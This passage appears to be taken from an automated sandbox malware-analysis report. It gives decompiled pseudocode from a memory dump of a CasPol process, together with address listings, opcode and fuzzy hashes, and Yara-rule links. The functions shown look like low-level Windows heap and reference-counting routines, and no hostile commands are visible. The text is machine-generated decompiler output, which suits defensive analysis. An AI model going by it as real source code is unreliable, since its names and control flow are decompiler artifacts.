							return L0143B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01412280(_t28, 0x14e8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							L0140FFB0(_t42, _t53, 0x14e8608);
							if(_t53 != 0) {
								L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						L0140FFB0(_t41, _t51, 0x14e8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                  0x01434a2c
                                                                  0x01434a34
                                                                  0x01434a3c
                                                                  0x01434a3e
                                                                  0x01434a48
                                                                  0x01434a4b
                                                                  0x01434a4d
                                                                  0x01434a51
                                                                  0x01434a9c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01434aa3
                                                                  0x01434aa8
                                                                  0x01434aad
                                                                  0x01434ab1
                                                                  0x01434ade
                                                                  0x01434ae3
                                                                  0x01434a5a
                                                                  0x01434a62
                                                                  0x01434a6a
                                                                  0x01434a6e
                                                                  0x0146f203
                                                                  0x01434a84
                                                                  0x01434a88
                                                                  0x01434a89
                                                                  0x01434a8a
                                                                  0x01434a95
                                                                  0x01434a95
                                                                  0x01434a79
                                                                  0x01434a80
                                                                  0x01434af2
                                                                  0x01434af4
                                                                  0x01434af9
                                                                  0x01434aff
                                                                  0x01434b01
                                                                  0x01434b03
                                                                  0x01434b08
                                                                  0x0146f20a
                                                                  0x0146f212
                                                                  0x0146f216
                                                                  0x0146f216
                                                                  0x01434b08
                                                                  0x01434b13
                                                                  0x01434b1a
                                                                  0x0146f229
                                                                  0x0146f229
                                                                  0x01434b1a
                                                                  0x01434a82
                                                                  0x00000000
                                                                  0x01434a82
                                                                  0x01434ab7
                                                                  0x01434acd
                                                                  0x01434acd
                                                                  0x01434ad5
                                                                  0x01434ada
                                                                  0x00000000
                                                                  0x01434ada
                                                                  0x01434ac2
                                                                  0x01434acb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01434acb
                                                                  0x01434a53
                                                                  0x01434a53
                                                                  0x01434a58
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7aca8750c56209a788a626a6ad1a4a88c84f322f0564b3549d6f62b41c513842
                                                                  • Instruction ID: 399cd1a906db26b260efb2f82a9144faf00f9cc190942cbcb7f3b41c6e9ffae4
                                                                  • Opcode Fuzzy Hash: 7aca8750c56209a788a626a6ad1a4a88c84f322f0564b3549d6f62b41c513842
                                                                  • Instruction Fuzzy Hash: E131F5322012119BC732EF69C944B6BBBE4FBD9610F18042FE85547271CBB0D806CB85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 013F9100 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 76%
                                                                  			E013F9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x14cf6e8);
				E0144D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E014C88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0144D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x14e86c0; // 0xf907b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x14e86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01412280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E014C88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							L0143AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x14eb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x14e84c0;
										if(_t69 >=  *0x14e84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E014C9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E013F922A(_t82);
							_t53 = E01417D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E014C8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x14e86c0; // 0xf907b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x14e86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x14e86bc;
										_t72 = 0x14e86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E013F9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x14e86c4;
									_t72 = 0x14e86c0;
									L18:
									E01429B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                  0x013f9100
                                                                  0x013f9100
                                                                  0x013f9100
                                                                  0x013f9100
                                                                  0x013f9102
                                                                  0x013f9107
                                                                  0x013f910c
                                                                  0x013f9110
                                                                  0x013f9115
                                                                  0x013f9136
                                                                  0x013f9143
                                                                  0x014537e4
                                                                  0x014537e4
                                                                  0x013f9149
                                                                  0x013f914e
                                                                  0x013f914e
                                                                  0x013f9117
                                                                  0x013f911d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x013f911f
                                                                  0x013f9125
                                                                  0x00000000
                                                                  0x013f9151
                                                                  0x013f9158
                                                                  0x013f915d
                                                                  0x013f9161
                                                                  0x013f9168
                                                                  0x01453715
                                                                  0x00000000
                                                                  0x013f916e
                                                                  0x013f916e
                                                                  0x013f9175
                                                                  0x013f9177
                                                                  0x013f917e
                                                                  0x013f917f
                                                                  0x013f9182
                                                                  0x013f9182
                                                                  0x013f9187
                                                                  0x013f9187
                                                                  0x013f918a
                                                                  0x013f918d
                                                                  0x013f918f
                                                                  0x013f9192
                                                                  0x013f9195
                                                                  0x013f9198
                                                                  0x013f9198
                                                                  0x013f9198
                                                                  0x013f919a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0145371f
                                                                  0x01453721
                                                                  0x01453727
                                                                  0x0145372f
                                                                  0x01453733
                                                                  0x01453735
                                                                  0x01453738
                                                                  0x0145373b
                                                                  0x0145373d
                                                                  0x01453740
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01453746
                                                                  0x01453749
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0145374f
                                                                  0x01453751
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01453757
                                                                  0x01453759
                                                                  0x0145375c
                                                                  0x0145375c
                                                                  0x0145375e
                                                                  0x0145375e
                                                                  0x01453761
                                                                  0x01453764
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01453766
                                                                  0x01453768
                                                                  0x014537a3
                                                                  0x014537a3
                                                                  0x014537a5
                                                                  0x014537a7
                                                                  0x014537ad
                                                                  0x014537b0
                                                                  0x014537b2
                                                                  0x014537bc
                                                                  0x014537c2
                                                                  0x014537c2
                                                                  0x014537b2
                                                                  0x013f9187
                                                                  0x013f9187
                                                                  0x013f918a
                                                                  0x013f918d
                                                                  0x013f918f
                                                                  0x013f9192
                                                                  0x013f9195
                                                                  0x00000000
                                                                  0x013f9195
                                                                  0x00000000
                                                                  0x013f9187
                                                                  0x0145376a
                                                                  0x0145376a
                                                                  0x0145376c
                                                                  0x0145376c
                                                                  0x0145376f
                                                                  0x01453775
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01453777
                                                                  0x01453779
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01453782
                                                                  0x01453787
                                                                  0x01453789
                                                                  0x01453790
                                                                  0x01453790
                                                                  0x0145378b
                                                                  0x0145378b
                                                                  0x0145378b
                                                                  0x01453792
                                                                  0x01453795
                                                                  0x01453795
                                                                  0x01453798
                                                                  0x01453798
                                                                  0x0145379b
                                                                  0x0145379b
                                                                  0x013f91a3
                                                                  0x013f91a9
                                                                  0x013f91b0
                                                                  0x013f91b4
                                                                  0x013f91b4
                                                                  0x013f91bb
                                                                  0x013f91c0
                                                                  0x013f91c5
                                                                  0x013f91c7
                                                                  0x014537da
                                                                  0x013f91cd
                                                                  0x013f91cd
                                                                  0x013f91cd
                                                                  0x013f91d2
                                                                  0x013f91d5
                                                                  0x013f9239
                                                                  0x013f9239
                                                                  0x013f91d7
                                                                  0x013f91db
                                                                  0x013f91e1
                                                                  0x013f91e7
                                                                  0x013f91fd
                                                                  0x013f9203
                                                                  0x013f921e
                                                                  0x013f9223
                                                                  0x00000000
                                                                  0x013f9223
                                                                  0x013f9205
                                                                  0x013f9208
                                                                  0x013f920c
                                                                  0x013f9214
                                                                  0x013f9214
                                                                  0x013f91e9
                                                                  0x013f91e9
                                                                  0x013f91ee
                                                                  0x013f91f3
                                                                  0x013f91f3
                                                                  0x013f91f3
                                                                  0x013f91e7
                                                                  0x00000000
                                                                  0x013f91db
                                                                  0x013f9187
                                                                  0x013f9168

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8ea0b5034ccc5919679054df04f3876bd841a8718789c6c2d76f1562a600797e
                                                                  • Instruction ID: a7ccf3d460929a4278461c7b85644e001a13287c8827db6b315f2d1a3554d846
                                                                  • Opcode Fuzzy Hash: 8ea0b5034ccc5919679054df04f3876bd841a8718789c6c2d76f1562a600797e
                                                                  • Instruction Fuzzy Hash: EA31C575A00246DFEB25DF6CC048B9DBBF1BB5835CF14816EE60467362C334A980CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01410050 Relevance: .1, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 53%
                                                                  			E01410050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x14ed360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				L01429ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return L0143B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E014C8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = L01429702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x14eb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                  0x01410055
                                                                  0x0141005d
                                                                  0x01410062
                                                                  0x0141006c
                                                                  0x0141006f
                                                                  0x01410074
                                                                  0x0141007a
                                                                  0x0141007a
                                                                  0x01410080
                                                                  0x01410080
                                                                  0x01410087
                                                                  0x0141008d
                                                                  0x0141008f
                                                                  0x01410093
                                                                  0x01410095
                                                                  0x0141009b
                                                                  0x014100f8
                                                                  0x014100fb
                                                                  0x014100fc
                                                                  0x014100ff
                                                                  0x01410108
                                                                  0x01410108
                                                                  0x014100a2
                                                                  0x014100a6
                                                                  0x014100b3
                                                                  0x014100bc
                                                                  0x014100c5
                                                                  0x014100ca
                                                                  0x0145c01e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0145c02d
                                                                  0x014100d5
                                                                  0x014100d9
                                                                  0x0145c03d
                                                                  0x0145c046
                                                                  0x0145c046
                                                                  0x014100df
                                                                  0x014100e2
                                                                  0x014100ea
                                                                  0x014100ef
                                                                  0x014100f2
                                                                  0x014100f6
                                                                  0x01410111
                                                                  0x01410117
                                                                  0x01410117
                                                                  0x00000000
                                                                  0x014100f6
                                                                  0x014100d0
                                                                  0x014100d0
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f368ad3e20dc872982a81365d4d3c99c98ceb4f5c7e7d49f02624b5ed6cba50
                                                                  • Instruction ID: 59fd4a72857d54256c28697fc8257e798b1031db0962de98b24fd3dcb54aaa38
                                                                  • Opcode Fuzzy Hash: 9f368ad3e20dc872982a81365d4d3c99c98ceb4f5c7e7d49f02624b5ed6cba50
                                                                  • Instruction Fuzzy Hash: 9331CE71601B04CFD722CF28D840B97B7E5FF88714F14856EE59A87BA4EB35A841CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014390AF Relevance: .1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 82%
                                                                  			E014390AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(L0144D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(L0142E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01414620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0143F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0142A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                  0x014390af
                                                                  0x014390b8
                                                                  0x014390bb
                                                                  0x014390bf
                                                                  0x014390c2
                                                                  0x014390c2
                                                                  0x014390c8
                                                                  0x014390cb
                                                                  0x014390cd
                                                                  0x014714d7
                                                                  0x014714eb
                                                                  0x014714eb
                                                                  0x00000000
                                                                  0x014714eb
                                                                  0x014714db
                                                                  0x014714e6
                                                                  0x00000000
                                                                  0x014714f2
                                                                  0x014714e8
                                                                  0x00000000
                                                                  0x014714e8
                                                                  0x014390d8
                                                                  0x014390da
                                                                  0x014390dd
                                                                  0x014390e5
                                                                  0x00000000
                                                                  0x01439139
                                                                  0x014390fa
                                                                  0x014390fe
                                                                  0x01439142
                                                                  0x00000000
                                                                  0x01439142
                                                                  0x01439104
                                                                  0x01439107
                                                                  0x0143910b
                                                                  0x01439110
                                                                  0x01439118
                                                                  0x01439147
                                                                  0x01439148
                                                                  0x0143914f
                                                                  0x01439150
                                                                  0x01439151
                                                                  0x01439152
                                                                  0x01439156
                                                                  0x0143915d
                                                                  0x01439160
                                                                  0x01439168
                                                                  0x0143916c
                                                                  0x014391bc
                                                                  0x014391be
                                                                  0x00000000
                                                                  0x014391be
                                                                  0x0143916e
                                                                  0x01439173
                                                                  0x01439176
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0143917c
                                                                  0x01439180
                                                                  0x014391b5
                                                                  0x00000000
                                                                  0x014391b5
                                                                  0x01439182
                                                                  0x01439185
                                                                  0x01439189
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0143918e
                                                                  0x01439190
                                                                  0x01439198
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014391a0
                                                                  0x00000000
                                                                  0x014391ad
                                                                  0x014391ad
                                                                  0x014391b0
                                                                  0x014391b1
                                                                  0x00000000
                                                                  0x01439185
                                                                  0x0143911a
                                                                  0x0143911c
                                                                  0x0143911f
                                                                  0x01439125
                                                                  0x01439127
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                  • Instruction ID: dcc6dd305496df8bf9f4f45a3541b8c94825c0ab1e81ae7039ca6c6d4c697fa7
                                                                  • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                  • Instruction Fuzzy Hash: 24214171A00205EFEB21DF59C584A9AFBF8EB98754F14887FE985A7220D370AD45CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01423B7A Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 59%
                                                                  			E01423B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x14e84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x14e84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01414620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x14e84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0143AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0143FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x14e84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x14e84c4; // 0x0
					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                  0x01423b89
                                                                  0x01423b96
                                                                  0x01423ba1
                                                                  0x01423bab
                                                                  0x01423bb5
                                                                  0x01423bb9
                                                                  0x01466298
                                                                  0x01423bbf
                                                                  0x01423bc2
                                                                  0x01423bc3
                                                                  0x01423bc9
                                                                  0x01423bca
                                                                  0x01423bcc
                                                                  0x01423bcd
                                                                  0x01423bd4
                                                                  0x01423bd6
                                                                  0x01423bdb
                                                                  0x01423bea
                                                                  0x01423bf7
                                                                  0x01423bfb
                                                                  0x01423bff
                                                                  0x01423c09
                                                                  0x01423c0a
                                                                  0x01423c0b
                                                                  0x01423c0f
                                                                  0x01423c14
                                                                  0x01423c18
                                                                  0x01423c18
                                                                  0x01423bfb
                                                                  0x01423c1b
                                                                  0x01423c30
                                                                  0x01423c30
                                                                  0x01423c3d

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6799e3fbe4fe246c7f1b69db1f3fdb10d4aea7c246db1a43ad0c84d7fe63aa73
                                                                  • Instruction ID: ba791b3a159b8749bf9c3df2e0052f3ed92bdebd0b132feb6690f9b4f1100bf5
                                                                  • Opcode Fuzzy Hash: 6799e3fbe4fe246c7f1b69db1f3fdb10d4aea7c246db1a43ad0c84d7fe63aa73
                                                                  • Instruction Fuzzy Hash: C721C272A00119AFDB11DF59CE81F6ABBBDFB54308F1501A9E608AB262D375ED41CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0142B390 Relevance: .1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 54%
                                                                  			E0142B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01412280(_t12, 0x14e8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E014300C2(0x14e8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                  0x0142b395
                                                                  0x0142b3a2
                                                                  0x0142b3a5
                                                                  0x0142b3aa
                                                                  0x0142b3b2
                                                                  0x0142b3ba
                                                                  0x0142b3bd
                                                                  0x0142b3c0
                                                                  0x0142b3c4
                                                                  0x0142b3c9
                                                                  0x0146a3e9
                                                                  0x0146a3ed
                                                                  0x0146a3f0
                                                                  0x0146a3ff
                                                                  0x0146a403
                                                                  0x0146a409
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0146a40b
                                                                  0x0146a40b
                                                                  0x0146a40f
                                                                  0x0146a415
